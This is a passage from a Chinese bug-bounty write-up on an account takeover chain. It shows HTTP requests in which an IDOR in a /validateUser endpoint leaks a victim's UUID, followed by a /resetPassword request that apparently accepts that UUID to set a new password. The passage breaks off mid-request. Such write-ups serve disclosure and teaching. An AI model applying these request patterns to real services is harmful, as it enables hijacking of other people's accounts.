【网络安全 | 漏洞挖掘】四链路账户接管
未经许可,不得转载。
文章目录
-
- 正文
正文
这一过程始于身份验证流程中的 IDOR 漏洞。登录时,后台会发送多个请求。在 Burp Suite 分析这些请求时,我注意到一个值得关注的请求:
请求:
POST /validateUser
{
"email": "victim@example.com"
}
响应:
{
"uuid": "123e4567-e89b-12d3-a456-426614174000"
}
响应中返回了用户的 UUID——一个关键信息,后续攻击链的核心。
随后,我检查了密码重置功能。通常,重置密码涉及多个请求,包括 OTP 验证。然而,我发现了一个存在问题的请求:
请求:
POST /resetPassword
{
"uuid": "123e4567-e89b-12d3-a456-426614174000",
"newPassword": "P@ssw0rd12